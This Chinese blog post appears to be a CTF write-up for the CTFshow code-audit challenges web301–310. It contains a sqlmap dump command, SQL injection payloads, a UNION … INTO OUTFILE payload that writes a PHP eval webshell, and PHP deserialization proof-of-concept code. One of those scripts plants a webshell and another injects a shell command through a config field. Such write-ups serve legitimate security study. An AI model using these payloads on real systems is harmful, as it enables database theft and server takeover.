CTFSHOW代码审计WP

最新推荐文章于 2023-09-21 20:00:18 发布
最新推荐文章于 2023-09-21 20:00:18 发布
阅读量260 收藏
点赞数
分类专栏: CTF 文章标签: php 开发语言 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39608382/article/details/128634334
版权

web301

没过滤

sqlmap

sqlmap -u "http://aff90e09-7d76-404f-b0b2-c327a085374b.challenge.ctf.show/checklogin.php" --form --batch --dump //--form sqlmap自己抓包

写马

web302

if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){

提示:strcasecmp() 函数是二进制安全的,且不区分大小写。

提示:该函数与 strncasecmp() 函数类似,不同的是,通过 strncasecmp() 您可以指定每个字符串用于比较的字符数

用的是$row['sds_password'],也就是执行完sql语句,所以直接在checklogin.php写shell就行

payload:user id=a ' union select "<?php eval($_POST[1]); ?>" into outfile "/var/www/html/a.php"%23&userpwd=1

web303

在fun.php中发现,echo出admin加密后的值,与数据库中的相等,由此判断该登陆账号密码是admin和admin

经过测试

然后进行注入

# 库名: sds

dpt_name=1%27,sds_address=(select database())#

# 表名: sds_dpt,sds_fl9g,sds_user

dpt_name=1%27,sds_address=(select group_concat(table_name) from information_schema.tables where table_schema=database())#

# 列名: flag

dpt_name=1%27,sds_address=(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')#

# 字段值

dpt_name=1%27,sds_address=(select group_concat(flag) from sds_fl9g)#

web304

payload如上题

web305

在checklogin.php中传cookie

web306

有waf,sql注入可能八成是搞不了了

从反序列化入手

class.php有个危险函数

然后利用这个搜索发现在dao.php引用过这个

index.php有反序列化函数也包含了dao.php文件

poc

<?php
class log
{
    public  $title;
    public $info;
}
class dao
{
    private $conn;
    public function __construct($a)
    {
        $this->conn=$a;
    }
}
$a=new log();

$a->title='0.php';
$a->info='<?php eval($_POST[cmd]);?>';
$b=new dao($a);
//echo serialize($b);
echo base64_encode(serialize($b));
//echo "<br>";
//echo
web307

发现没有什么调用这个的

然后看第二个

发现可以拼接

config.php里面 的

poc

<?php
class config{
    public $cache_dir=';echo \'<?php eval($_POST[1]);?>\' > 1.php;';
}
class dao
{
    private $config;
    public function __construct()
    {
        $this->config=new config();
    }
}
$a=new dao();
echo base64_encode(serialize($a));
web308

在dao.php中发现checkUpdate

跟踪发现在fun.php里

存在ssrf

利用gopherus打

利用index.php

web309

mysql有密码了,原来的方法不行了

FastCGI是一个可伸缩地、高速地在HTTP服务器和动态脚本语言间通信的接口(FastCGI接口在Linux下是socket(可以是文件socket,也可以是ip socket)),主要优点是把动态语言和HTTP服务器分离开来

然后在index.php 的cookie传

web310

读到敏感配置文件

访问4476

7july
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WP2-ctfshow
02-24
2
ctfshow web307
fmyyy1的博客
07-14 285
代码审计专题的 下载到源码 主要在dao.php和logout.php里面 dao.php里有个dao类,里面有个方法 在看logout.php 反序列化dao类 控制config里的cache_dir为我们的命令即可。 不过shell_exec函数有个特点 也就是说没回显,但写入文件就可以了,或者也可以反弹shell <?php class config{ public $cache_dir = 'aaa/*;cat /var/www/html/flag.php > /va
ctfshow代码审计
qq_61768489的博客
01-26 1218
4476端口对应着 /var/flag目录,有个index.html文件,这和我们连上蚁剑后知道的一样。给的源码还是308,还是用fastcgi,这次直接写shell进去,因为flag文件不知道在哪。可以利用file_put_contents来写shell ,需要调用close()方法。思路与上题一样,不过是输入的password经过了一点加密,构造一下就行。sql注入写shell也是没问题的,因为sql语句依旧是正常执行了。似乎没有调用,与上题一样,换一种方式,有报错信息就试试报错注入。
CTFshow——代码审计
D.MIND 的博客
04-07 1421
文章目录web301——SQL注入web301——SQL注入web303——报错注入web304——报错注入web305——web306——web307—— web301——SQL注入 将源码下载下来。主要看checklogin.php: $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; $result=$mysqli->query($sql); $row=
CTFSHOW-WEB入门代码审计
Re_ly0n的博客
11-02 420
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
ctfshow web入门代码审计 web301-305
m0_62207170的博客
04-20 432
ctfshow web入门代码审计 web301-305
WP1-ctfshow
最新发布
02-24
1
bugkctf 代码审计.md
04-01
学习的笔记,方便平时查看,bugkct代码审计wp,可以将我自己的见解分享给大家,使大家少走点弯路
Android sp&wp 测试代码
11-09
利用Eclipse C工程,将 Android sp&wp 在上面进行实现的代码、可以单步调用或运行。深入理解sp&wp的实现原理。抛开Andorid的大坨代码而不明其本质。
WP7页面导航代码
03-12
WP7页面导航代码,非常实用的代码,学习wp开发必会的代码
CTFshow 代码审计
starttv的博客
11-30 858
分析源码在dptadd.php有注入点,无过滤,但要求先登录,尝试弱口令admin,admin登录成功。所以我写入一个php查数据库的文件,可以正常查询。发现多了个class.php,并且在checklogin.php有反序列入口,到这里思路就清晰了。​协议的延时可以探测端口是否开放,开放的端口会保持连接,而未开放的端口会直接返回页面结果,经探测后。写入一句话木马后用蚁剑连接查数据库即可,数据库的用户名和密码可以在conn.php中找到。在index.php和login.php中发现反序列化入口。
ctfshow web入门 代码审计
Sentiment的博客
02-12 2857
web301
ctfshow代码审计
qq_63928796的博客
12-26 213
Seay审一下啥也没有,直接上手看在checklogin.php中sql语句中,username没有过滤而产生的sql注入漏洞登录成功拿到flag。
ctfshow web入门(代码审计)
qq_53263789的博客
07-19 327
ctfshow
ctfshow 代码审计 web301~310
shinygod的博客
09-24 769
知识点:SSRF--gopher协议打FastCGI(PHP-FPM的未授权访问漏洞),file伪协议,nginx配置文件
Ctfshow web入门 代码审计web301-web310 详细题解 全
Jay17的博客
09-21 1247
Ctfshow web入门 代码审计web301-web310 详细题解 全
PHP代码审计】ctfshow web入门 php特性 93-104
m0_63563528的博客
08-01 625
假设 “1.php” 是在 $allow 数组中,则会将 <?当访问 “1.php” 时,恶意代码 system(“tac flag36d.php”) 将会被执行,显示名为 “flag36d.php” 的文件内容的逆向(从最后一行到第一行)。正则表达式的含义是任意字符,后面跟着"p",后面跟着任意字符,后面跟着"h",后面再跟着任意字符,最后跟着"p",而。
PHP代码审计 -- 以ctfshow php特性 93-104为例
qq_44640313的博客
08-01 154
ctfshow php特性 93-104
【BUGKUCTF】代码审计wp
0nc3的博客
03-05 295
先放出解题情况,变量覆盖和绕过waf进不了就没做了 1.extract变量覆盖 题目链接:http://123.206.87.240:9009/1.php &amp;lt;?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content)...
ctfshow 菜狗杯 一言既出 wp
08-19
- *1* *2* *3* [ctfshow菜狗杯wp](https://blog.csdn.net/m0_62274649/article/details/127899835)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值